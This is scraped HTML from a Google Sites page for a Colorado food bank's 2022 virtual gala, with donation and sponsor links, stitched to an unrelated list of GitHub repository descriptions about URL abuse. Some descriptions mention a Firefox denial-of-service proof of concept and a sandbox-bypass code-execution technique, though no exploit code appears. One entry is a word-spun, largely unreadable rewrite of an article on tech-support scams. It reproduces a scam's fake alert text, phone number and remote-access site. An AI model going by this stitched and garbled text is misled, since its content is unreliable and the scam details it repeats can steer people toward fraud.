class="wFCWne" viewBox="0 0 24 24" stroke="currentColor" jsname="B1n9ub" focusable="false"><g transform="translate(12,12)"><path class="hlJH0" d="M-9 -5 L9 -5" fill="none" stroke-width="2"/><path class="HBu6N" d="M-9 0 L9 0" fill="none" stroke-width="2"/><path class="cLAGQe" d="M-9 5 L9 5" fill="none" stroke-width="2"/></g></svg></div><nav class="JzO0Vc" jsname="ihoMLd" role="navigation" tabindex="-1" id="yuynLe" jsaction="transitionend:UD2r5"><a class="XMyrgf" href="/lpsk12.org/coloradofoodabankvirtualgala22/home"><img src="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383" class="r9CsCb" role="img" aria-label="Site home"></a><a class="Zjiec oNsfjf" href="/lpsk12.org/coloradofoodabankvirtualgala22/home"><span>Coloradofoodabankvirtualgala2022</span></a><ul class="jYxBte Fpy8Db" role="navigation" tabindex="-1"><li jsname="ibnC6b" nav-level="1"><div class="PsKE7e r8s4j-R6PoUb IKA38e baH5ib oNsfjf lhZOrc" aria-current="true"><div class="I35ICb" jsaction="keydown:mPuKz(QwLHlb); click:vHQTA(QwLHlb);"><a class="aJHbb dk90Ob hDrhEe HlqNPb" jsname="QwLHlb" role="link" tabindex="0" data-navtype="1" aria-selected="true" href="/lpsk12.org/coloradofoodabankvirtualgala22/home" data-url="/lpsk12.org/coloradofoodabankvirtualgala22/home" data-type="1" data-level="1">Home</a></div></div></li><li jsname="ibnC6b" nav-level="1"><div class="PsKE7e r8s4j-R6PoUb IKA38e baH5ib oNsfjf"><div class="I35ICb" jsaction="keydown:mPuKz(QwLHlb); click:vHQTA(QwLHlb);"><a class="aJHbb dk90Ob hDrhEe HlqNPb" jsname="QwLHlb" role="link" tabindex="0" data-navtype="1" href="/lpsk12.org/coloradofoodabankvirtualgala22/donations" data-url="/lpsk12.org/coloradofoodabankvirtualgala22/donations" data-type="1" data-level="1">Donations</a></div></div></li><li jsname="ibnC6b" nav-level="1"><div class="PsKE7e r8s4j-R6PoUb IKA38e baH5ib oNsfjf"><div class="I35ICb" jsaction="keydown:mPuKz(QwLHlb); click:vHQTA(QwLHlb);"><a class="aJHbb dk90Ob hDrhEe HlqNPb" jsname="QwLHlb" role="link" tabindex="0" data-navtype="1" href="/lpsk12.org/coloradofoodabankvirtualgala22/sign-up-here" data-url="/lpsk12.org/coloradofoodabankvirtualgala22/sign-up-here" data-type="1" data-level="1">Sign Up Here!</a></div></div></li><li jsname="ibnC6b" nav-level="1"><div class="PsKE7e r8s4j-R6PoUb IKA38e baH5ib oNsfjf"><div class="I35ICb" jsaction="keydown:mPuKz(QwLHlb); click:vHQTA(QwLHlb);"><a class="aJHbb dk90Ob hDrhEe HlqNPb" jsname="QwLHlb" role="link" tabindex="0" data-navtype="1" href="/lpsk12.org/coloradofoodabankvirtualgala22/about-us" data-url="/lpsk12.org/coloradofoodabankvirtualgala22/about-us" data-type="1" data-level="1">About Us</a></div></div></li><li jsname="ibnC6b" nav-level="1"><div class="PsKE7e r8s4j-R6PoUb IKA38e baH5ib oNsfjf"><div class="I35ICb" jsaction="keydown:mPuKz(QwLHlb); click:vHQTA(QwLHlb);"><a class="aJHbb dk90Ob hDrhEe HlqNPb" jsname="QwLHlb" role="link" tabindex="0" data-navtype="1" href="/lpsk12.org/coloradofoodabankvirtualgala22/view-program" data-url="/lpsk12.org/coloradofoodabankvirtualgala22/view-program" data-type="1" data-level="1">View Program!</a></div></div></li></ul></nav><div class="VLoccc QDWEj" jsname="rtFGi"><div class="Pvc6xe"><div jsname="I8J07e" class="TlfmSc YSH9J"><a class="GAuSPc" jsname="jIujaf" href="/lpsk12.org/coloradofoodabankvirtualgala22/home"><img src="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383" class="lzy1Td" role="img" aria-label="Site home" jsname="SwcDWb"><span class="QTKDff p46B7e">Coloradofoodabankvirtualgala2022</span></a></div></div><div jsname="mADGA" class="zDUgLc"></div></div><div class="TxnWlb" jsname="BDdyze" jsaction="click:LUvzV"></div><div jscontroller="gK4msf" class="RBEWZc" jsname="h04Zod" jsaction="rcuQ6b:WYd;JIbuQc:AT95Ub;VbOlFf:HgE5D;FaOgy:HgE5D;MxH79b:JdcaS;" data-side-navigation="true"><div role="button" class="U26fgb mUbCce fKz7Od Wdnjke M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="R9oOZd" aria-label="Open search bar" aria-disabled="false" tabindex="0" data-tooltip="Open search bar" aria-expanded="false" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg class="vu8Pwe iWs3gf YSH9J" viewBox="0 0 24 24" focusable="false"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg></span></span></div><div class="vsGQBe wgxiMe" jsname="AznF2e"></div></div></div><script nonce="dJWtMAFtmjuzNhlJ8bIveA">DOCS_timing['navv'] = new Date().getTime();</script></header><div role="main" tabindex="-1" class="UtePc RCETm yxgWrb" dir="ltr"><section id="h.INITIAL_GRID.n3fzw246rj3t" class="yaqOZd LB7kq cJgDec nyKByd O13XJf" style=""><div class="Nu95r"><div class="IFuOkc" style="background-size: cover; background-position: center center; background-image: url(https://lh4.googleusercontent.com/9lhhVkiT_eCVcC4OS4ACkNychxfCjMCwmWJy3WD6nem2A_T8tlGAA1yF_Lhkw3p4zn7ooa2GL0hW11ap7SxkIsM=w16383);" jsname="LQX2Vd"></div></div><div class="mYVXT"><div class="LS81yb VICjCf" tabindex="-1"><div class="hJDwNd-AhqUyc-uQSCkd JNdkSc L6cTce-purZT L6cTce-pSzOP"><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"></div></div></div></div></div></section><section id="h.75c8be5e33dd375b_6" class="yaqOZd lQAHbd" style=""><div class="IFuOkc"></div><div class="mYVXT"><div class="LS81yb VICjCf" tabindex="-1"><div class="hJDwNd-AhqUyc-uQSCkd purZT-AhqUyc-II5mzb pSzOP-AhqUyc-qWD73c JNdkSc yYI8W "><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"><div class="oKdM2c Kzv0Me"><div id="h.75c8be5e33dd375b_3" class="hJDwNd-AhqUyc-uQSCkd jXK9ad D2fZ2 OjCsFc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd N0neUc baZpAe"><div role="presentation" class="U26fgb L7IXhc htnAL QmpIrf M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;" jsshadow aria-label="Donate Here!" aria-disabled="false" data-tooltip="Donate Here!" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><a class="FKF6mc TpQm9d QmpIrf" href="https://www.google.com/url?q=https%3A%2F%2Fsecure.foodbankrockies.org%2Fsite%2FDonation2%3Fdf_id%3D6741%26mfc_pref%3DT%266741.donation%3Dform1%26_ga%3D2.193447342.2028091947.1639097219-2147196906.1639097219&sa=D&sntz=1&usg=AFQjCNEL-cjINYRKHmSLVLjXVGVs1Tt24Q" target="_blank" aria-label="Donate Here!"><div class="NsaAfc"><p>Donate Here!</p></div><div class="wvnY3c" jsname="ksKsZd"></div></a></div></div></div></div></div><div class="oKdM2c"><div id="h.75c8be5e33dd375b_43" class="hJDwNd-AhqUyc-uQSCkd jXK9ad D2fZ2 wHaque QaN0Zc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd N0neUc baZpAe"><div role="presentation" class="U26fgb L7IXhc htnAL QmpIrf M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;" jsshadow aria-label="Sign Up Right Here!" aria-disabled="false" data-tooltip="Sign Up Right Here!" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><a class="FKF6mc TpQm9d QmpIrf" href="https://docs.google.com/forms/d/e/1FAIpQLSdeSEyrp2BcrtOoNObnQcs9eeVmhGs44ckvqRV3QqUc-kZr0A/viewform?usp=sf_link" target="_blank" aria-label="Sign Up Right Here!"><div class="NsaAfc"><p>Sign Up Right Here!</p></div><div class="wvnY3c" jsname="ksKsZd"></div></a></div></div></div></div></div></div></div></div></div></div></section><section id="h.75c8be5e33dd375b_17" class="yaqOZd lQAHbd" style=""><div class="IFuOkc"></div><div class="mYVXT"><div class="LS81yb VICjCf" tabindex="-1"><div class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf JNdkSc yYI8W "><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"><div class="oKdM2c Kzv0Me"><div id="h.75c8be5e33dd375b_39" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 OjCsFc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd baZpAe"><div class="t3iYD"><img src="https://lh5.googleusercontent.com/C3hi4eRcyAub8Prpf1Xuk2K5tvKseGXjWXe_Fsa3l6DuTL28txYiYFGdPBgMVTlP3-CeHH__eVWP_CPL3VeUCis=w1280" class="CENy8b" role="img"></div></div></div></div></div><div class="oKdM2c"><div id="h.75c8be5e33dd375b_22" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 wHaque GNzUNc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd mGzaTb baZpAe"><p dir="ltr" class="CDt4Ke zfr3Q" style="margin-left: 30pt; padding-left: 0; text-indent: 0;"> <span class=" aw5Odc" style="font-variant: normal; text-decoration: underline;"><a class="XqQF9c" href="https://www.google.com/url?q=https%3A%2F%2Fwww.kingsoopers.com%2F&sa=D&sntz=1&usg=AFQjCNELlrNbgNiqQajj1a7tNUAJYhH0Tw" target="_blank">King Soopers</a></span><span style="font-variant: normal;"> </span></p></div></div></div></div></div></div></div><div class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf JNdkSc yYI8W "><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"><div class="oKdM2c Kzv0Me"><div id="h.75c8be5e33dd375b_40" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 OjCsFc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd baZpAe"><div class="t3iYD"><img src="https://lh5.googleusercontent.com/COamqdEVowtIh7FU8Biwce81fStavPhudOKphQ56EZnGnmg9pAgDjO_YDsyYPebSObLiWjdqw8i6H9KgryUJ8QOnaLMhHz5pQZcoFTqvVJLAsl8-a2uk3o-itR0XT8Y6tw=w1280" class="CENy8b" role="img"></div></div></div></div></div><div class="oKdM2c"><div id="h.75c8be5e33dd375b_27" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 wHaque GNzUNc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd mGzaTb baZpAe"><p dir="ltr" class="CDt4Ke zfr3Q" style="text-align: center;"><span class=" aw5Odc" style="text-decoration: underline;"><a class="XqQF9c" href="https://www.google.com/url?q=https%3A%2F%2Fwww.safeway.com%2F&sa=D&sntz=1&usg=AFQjCNHxGPrUMPyD4eRLI7InWEJS4bRBtQ" target="_blank">Safeway</a></span> </p></div></div></div></div></div></div></div><div class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf JNdkSc yYI8W "><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"><div class="oKdM2c Kzv0Me"><div id="h.75c8be5e33dd375b_41" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 OjCsFc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd baZpAe"><div class="t3iYD"><img src="https://lh3.googleusercontent.com/6AcsCo-jUs4bG1op1KlIJs4tR0cYk9S-m8WJQo2reDAvgqeFYnraxOS1XNt72MD0p6lGJo7CYOgD0fgNoN2cESk=w1280" class="CENy8b" role="img" style="width: 100%; margin: 0% 0 0% 0%"></div></div></div></div></div><div class="oKdM2c"><div id="h.75c8be5e33dd375b_32" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 wHaque GNzUNc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd mGzaTb baZpAe"><p dir="ltr" class="CDt4Ke zfr3Q" style="text-align: center;"><span class=" aw5Odc" style="text-decoration: underline;"><a class="XqQF9c" href="https://www.google.com/url?q=https%3A%2F%2Fwww.traderjoes.com%2Fhome&sa=D&sntz=1&usg=AFQjCNHpgz1sHK207KO5qJ7s_v8jJG7n0A" target="_blank">Trader Joe's </a></span> </p></div></div></div></div></div></div></div><div class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf JNdkSc yYI8W "><div class="JNdkSc-SmKAyb"><div class="" jscontroller="sGwD4d" jsaction="zXBUYb:zTPCnb;zQF9Uc:Qxe3nd;" jsname="F57UId"><div class="oKdM2c Kzv0Me"><div id="h.75c8be5e33dd375b_42" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 OjCsFc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd baZpAe"><div class="t3iYD"><img src="https://lh5.googleusercontent.com/-cZOIbD_TKy9wUH7HqXyDy1KWfCgncuvOHgsDRSrW-UxWZNWglhbkblUSW5dyzAto-RtkQa4nlG2y9lBzCaHfAE=w1280" class="CENy8b" role="img" style="width: 100%; margin: 0% 0 0% 0%"></div></div></div></div></div><div class="oKdM2c"><div id="h.75c8be5e33dd375b_37" class="hJDwNd-AhqUyc-c5RTEf purZT-AhqUyc-c5RTEf pSzOP-AhqUyc-c5RTEf jXK9ad D2fZ2 wHaque GNzUNc"><div class="jXK9ad-SmKAyb"><div class="tyJCtd mGzaTb baZpAe"><p dir="ltr" class="CDt4Ke zfr3Q" style="text-align: center;"><span class=" aw5Odc" style="text-decoration: underline;"><a class="XqQF9c" href="https://www.google.com/url?q=https%3A%2F%2Fwww.wholefoodsmarket.com%2F&sa=D&sntz=1&usg=AFQjCNFRnSj1V2R471pFC59B68QBlEZMBg" target="_blank">Whole Foods</a></span> </p></div></div></div></div></div></div></div></div></div></section></div><div class="Xpil1b"></div><div jscontroller="j1RDQb" jsaction="rcuQ6b:rcuQ6b;MxH79b:JdcaS;FaOgy:XuHpsb;" class="dZA9kd ynRLnc" data-last-updated-at-time="1639450453230"><div role="button" class="U26fgb JRtysb WzwrXb I12f0b K2mXPb zXBiaf ynRLnc" jscontroller="iSvg6e" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;;keydown:I481le;" jsshadow jsname="Bg3gkf" aria-label="Site actions" aria-disabled="false" tabindex="0" aria-haspopup="true" aria-expanded="false" data-menu-corner="bottom-start" data-anchor-corner="top-start"><div class="NWlf3e MbhUzd" jsname="ksKsZd"></div><span jsslot class="MhXXcc oJeWuf"><span class="Lw7GHd snByac"><svg width="24" height="24" viewBox="0 0 24 24" focusable="false" class=" NMm5M"><path d="M11 17h2v-6h-2v6zm1-15C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zM11 9h2V7h-2v2z"/></svg></span></span><div jsname="xl07Ob" style="display:none" aria-hidden="true"><div class="JPdR6b hVNH5c" jscontroller="uY3Nvd" jsaction="IpSVtb:TvD9Pc;fEN2Ze:xzS4ub;frq95c:LNeFm;cFpp9e:J9oOtd; click:H8nU8b; mouseup:H8nU8b; keydown:I481le; keypress:Kr2w4b; blur:O22p3e; focus:H8nU8b" role="menu" tabindex="0" style="position:fixed"><div class="XvhY1d" jsaction="mousedown:p8EH2c; touchstart:p8EH2c;"><div class="JAPqpe K0NPx"><span jsslot class="z80M1 FeRvI" jsaction="click:o6ZaF(preventDefault=true); mousedown:lAhnzb; mouseup:Osgxgf; mouseenter:SKyDAe; mouseleave:xq3APb;touchstart:jJiBRc; touchmove:kZeBdd; touchend:VfAz8(preventMouseEvents=true)" jsname="j7LFlb" data-disabled-tooltip="Contact is not available in preview mode" aria-label="Contact" role="menuitem" tabindex="-1"><div class="aBBjbd MbhUzd" jsname="ksKsZd"></div><div class="uyYuVb oJeWuf" jscontroller="j3gDVb" jsaction="JIbuQc:sGCPHc;" jsmodel="Rta7Nb" data-normalized-path="lpsk12.org/coloradofoodabankvirtualgala22/home"><div class="jO7h3c">Contact</div></div></span><span jsslot class="z80M1 FeRvI" jsaction="click:o6ZaF(preventDefault=true); mousedown:lAhnzb; mouseup:Osgxgf; mouseenter:SKyDAe; mouseleave:xq3APb;touchstart:jJiBRc; touchmove:kZeBdd; touchend:VfAz8(preventMouseEvents=true)" jsname="j7LFlb" data-disabled-tooltip="Report abuse is not available in preview mode" aria-label="Report abuse" role="menuitem" tabindex="-1"><div class="aBBjbd MbhUzd" jsname="ksKsZd"></div><div class="uyYuVb oJeWuf" jscontroller="HYv29e" jsaction="JIbuQc:dQ6O0c;" jsname="xx9PJb" data-abuse-proto="%.@.null,"109123138299365960604","https://sites.google.com/lpsk12.org/coloradofoodabankvirtualgala22/home",null,null,[],[]]"><div class="jO7h3c">Report abuse</div></div></span><span jsslot class="z80M1 FeRvI" jsaction="click:o6ZaF(preventDefault=true); mousedown:lAhnzb; mouseup:Osgxgf; mouseenter:SKyDAe; mouseleave:xq3APb;touchstart:jJiBRc; touchmove:kZeBdd; touchend:VfAz8(preventMouseEvents=true)" jsname="j7LFlb" aria-label="Page details" role="menuitem" tabindex="-1"><div class="aBBjbd MbhUzd" jsname="ksKsZd"></div><div class="uyYuVb oJeWuf" jsaction="JIbuQc:hriXLd;" jsname="Rg8K2c"><div class="jO7h3c">Page details</div></div></span></div></div></div></div></div></div><div jscontroller="j1RDQb" jsaction="focusin:gBxDVb(srlkmf); focusout:zvXhGb(srlkmf); click:ro2KTd(psdQ5e),Toy3n(V2zOu);JIbuQc:DSypkd(Bg3gkf);MxH79b:JdcaS;rcuQ6b:rcuQ6b;" class="LqzjUe ynRLnc" data-last-updated-at-time="1639450453230"><div jsname="psdQ5e" class="Q0cSn"></div><div jsname="bN97Pc" class="hBW7Hb"><div role="button" class="U26fgb mUbCce fKz7Od kpPxtd QMuaBc M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="Bg3gkf" aria-label="Site actions" aria-disabled="false" tabindex="-1" aria-hidden="true"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg width="24" height="24" viewBox="0 0 24 24" focusable="false" class=" NMm5M"><path d="M11 17h2v-6h-2v6zm1-15C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zM11 9h2V7h-2v2z"/></svg></span></span></div><div jsname="srlkmf" class="hUphyc"><div class="YkaBSd"><div class="iBkmkf"><span>Page updated</span> <span jsname="CFIm1b" class="dji00c" jsaction="AHmuwe:eGiyHb; mouseover:eGiyHb;" tabindex="0" role="contentinfo"></span></div></div><div class="YkaBSd" jscontroller="j3gDVb" jsmodel="Rta7Nb" jsaction="click:sGCPHc;" data-normalized-path="lpsk12.org/coloradofoodabankvirtualgala22/home"><div role="button" class="U26fgb kpPxtd J7BuEb" jsshadow aria-label="Contact " aria-disabled="false" tabindex="0">Contact</div></div><div class="YkaBSd" jscontroller="HYv29e" jsaction="click:dQ6O0c;" data-abuse-proto="%.@.null,"109123138299365960604","https://sites.google.com/lpsk12.org/coloradofoodabankvirtualgala22/home",null,null,[],[]]"><div role="button" class="U26fgb kpPxtd J7BuEb" jsshadow aria-label="Report abuse" aria-disabled="false" tabindex="0">Report abuse</div></div></div></div></div><div jsname="kdb7zb"><div jscontroller="kklOXe" jsmodel="nbZU0e" jsaction="rcuQ6b:rcuQ6b;FaOgy:nkegzf;BU3dg:U3QbAf;HRy4zb:Z8zbSc;" class="Qg1aof HnW5Jb"><div class="t5XhQc" jsname="LgbsSe"><div jscontroller="TW9Rvc" jsaction="rcuQ6b:WYd;" tabindex="0"><div role="presentation" class="U26fgb XHsn7e MAXCNe M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;" jsshadow jsname="LgbsSe" aria-label="Edit this page" aria-disabled="false" data-tooltip="Edit this page" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><a class="FKF6mc TpQm9d" href="/u/0/d/1nXWCuHwUIByUiSEZ1GhPb1xqLzH6owRA/p/15xQki5RuXpWfPBLFug6PK9kvOv58b08z/edit?authuser=0&usp=edit_published_site" aria-label="Edit this page"><div class="HaXdpb wb61gb"></div><div class="HRp7vf MbhUzd" jsname="ksKsZd"></div><span jsslot class="Ip8zfc"><svg class="EI709d" viewBox="0 0 24 24" fill="currentColor" focusable="false"><path d="M3 17.25V21h3.75L17.81 9.94l-3.75-3.75L3 17.25zM20.71 7.04c.39-.39.39-1.02 0-1.41l-2.34-2.34c-.39-.39-1.02-.39-1.41 0l-1.83 1.83 3.75 3.75 1.83-1.83z"/><path d="M0 0h24v24H0z" fill="none"/></svg></span></a></div></div></div></div></div></div></div><script nonce="dJWtMAFtmjuzNhlJ8bIveA">DOCS_timing['cov']=new Date().getTime();</script><script src="https://www.gstatic.com/_/atari/_/js/k=atari.vw.en.RAG4EMOkjRs.O/d=1/rs=AGEqA5mcVDERDUrCYzpljALirFemxq_WJw/m=view" id="base-js" nonce="dJWtMAFtmjuzNhlJ8bIveA"></script></div></div><div jscontroller="YV8yqd" jsaction="rcuQ6b:npT2md"><div id="docs-aria-speakable" aria-live="assertive" aria-relevant="additions" aria-atomic="true" aria-hidden="false" role="region" class="IWfHH"></div></div></body></html>
sarthaksinha2003
A scalable URL shortening service designed to efficiently handle high-frequency access patterns while preventing abuse and ensuring reliable redirection.
TheSchokomilchFoundation
WebIron has decided to include a webbug in all of their abuse emails. IronFist has been designed to generate the unique webbug url by parsing their latest JSON data. If all of the resulting urls would be visited, then their webbug tracking becomes unusable.
zerosonesfun
This WordPress plugin allows authorized users to create posts by providing data via URL parameters. It enforces user rate limiting to prevent abuse and uses the blog's default category for post assignments.
myself-nahid
This Django-based URL Shortener app converts long URLs into unique 6-character keys for easy sharing. It includes an anti-spam feature that limits requests per IP within a configurable time frame. If exceeded, the IP is temporarily blocked for a set period. This ensures secure usage and protects the server from abuse.
sskalnik
Apologies to whoever pays the S3 bill for search.stepmaniaonline.net... This is just a Mechanize-based Ruby script that takes start and end indices, then downloads each simfile pack by abusing the ability to "walk" the URLs following the pattern of "https://search.stepmaniaonline.net/pack/id/12345".
tricolite
Tricolite abstruse abutment organizations are notable for base unsaved PC audience by addled them in with anxiety strategies and charging a lot of banknote for apocryphal administrations. As a rule, these abyss action chargeless aegis items for several dollars added than their absolute retail cost. Aegis merchants may not apperceive about these practices not to acknowledgment what array of offers angle con artists use to constrain those deals. In one of the a lot of bleak scenarios of abuse we accept apparent as such, an alignment that happens to be a activating alone from the Symantec Accomplice Affairs is ambiguous individuals with affected notices advised to resemble Symantec's baton item, Norton Antivirus Support Bolster. The accessible bulletin is apparent by agency of a page facilitated on Norton Antivirus Abutment and urges audience to alarm for bolster instantly saying: "Framework Basically Tainted. On the off adventitious that you are not accessible to tap on this catch, Promptly acquaintance Bolster assessment Chargeless Helpline 1-877-248-1301" Obviously this awning is absolutely fake, yet abutting with a advancing complete bulletin arena out of sight, it ability be acceptable to baffle a few clients. We chose to alarm the after assessment band to see what array of bolster we may get. Our desires were not top but rather we were not set up for what we would in the end discover. We were told to go to fastsupport.com to admittance the able to yield limited ascendancy of our PC, forth these curve allotment him to play out an indicative. This action is a centermost allotment of the ambush aback it permits law breakers to fix their adhere on abeyant casualties. With limited get to, con artists can in actuality do whatever they charge on the client's apparatus including demography athenaeum to introducing (genuine) malware. Once the able was active in, he blown no time in traveling for the a lot of atrocious allurement activated by abstruse abutment tricksters, the Windows Occasion Viewer. Unfortunately, Microsoft's focal log and aberration advertisement apparatus can actual finer be activated because of those chicken and red notices, which a lot of of the time is impeccably ordinary. Obviously, for a con artisan it's the ideal adjustment for guaranteeing those are Norton Antivirus Bolster. Not blessed with this, the able ample he could cull accession notable allurement to do what needs to be done. This time he opened up the Assignment Director and brought up a specific action called. This certificate is a centermost Windows affairs about as is frequently the case, malware creators consistently renames their examples to resemble a 18-carat almanac and advance a agnate allotment tradition. Googling for Norton Antivirus Bolster gives aback a few pages that drag anthology scanners to seek for mistakes affiliated with that almanac name, and in accession portrayals allotment this action as a Trojan. That is all the bluff absolutely needs to accomplish his point, after analytical or blockage whether the action getting referred to is the 18-carat one or a bit of malware. Now admitting aggregate we don't apperceive who this alignment is and the capital abstracts we accept Norton Antivirus Bolster assessment chargeless amount from the affected admonishing page. The chapter access demonstrates that they are Silurian Abstruse support. We instantly appear the greater allotment of our acceptance to Symantec who advised this case important and affirmed that this alignment was in actuality an alone from the program. Symantec additionally let us apprehend that they would accomplish quick move to actuate this issue. It is a adverse bearings if Norton Antivirus Bolster abstruse abutment con artists are not ashamed about utilizing deceives action their items and administrations additionally abandon their accomplices, forth these curve incurring cast and ballyhoo harm. More generally than not, Norton Antivirus bolster gave by these evildoers is aisle beneath standard, and acutely we frequently bolt wind of individuals' PCs breakable than if they initially brought in. That prompts to abatement demands which now and afresh wind up with the actual aegis merchants whose items are mishandled. At Malware bytes, we consistently bolt wind of individuals that purchased our artefact for abounding dollars, some of the time even added than one thousand dollars. They anticipate we awash it to them (frequently tricksters imitate astronomic brands) and it is abominable to charge to acquaint them they were bamboozled and may never beam their banknote again. The best allowance adjoin abstruse abutment tricks charcoal applicant amenity and abandoned active at whatever point against one of those affected notices. The law breakers' incomparable weapon is amusing designing aback they depend on individuals dupe their fabricated up stories. On the off adventitious that you can atom affected alarms and pop ups, abstain them and don't alarm the assessment chargeless number. On the off adventitious that you are agog on acceptable in arresting abeyant new casualties, amuse almanac the URLs, Norton Antivirus Bolster blast numbers and altered attenuate elements you can snatch (screen catches additionally action assistance). These can be accounted for on altered discussions and even to us accurately with the ambition that we can abutting down those con artists' allotment focuses and advice law approval chase them. On the off adventitious that you, or somebody you apperceive has as of now been misled, don't alternate to attending at our asset page for added abstracts on the a lot of accomplished adjustment to ameliorate from these assaults and apprehend advance abuse and amazing expenses.
genilsoncm
No description available
seo2020job-dotcom
No description available
Stevoisiak
A proof of concept denial-of-service exploit in Firefox that abuses URL protocol redirects.
mbailey07190
Collaborative animal abuse url
cyberanalyst86
bulk query to VT urlsan abuseidb
karthika-u07
Scalable Django URL shortener featuring custom rate limiting, heuristic abuse detection, analytics, and production-style backend architecture.
Sambal0x
WebView - Abusing Unsafe Internal URL Handling
Piotr-Zaborowski
Simple program finding abuse email adress for given URLs.
hasbiyama
abusing url protocol+config for arbitrary codexec via sandbox bypass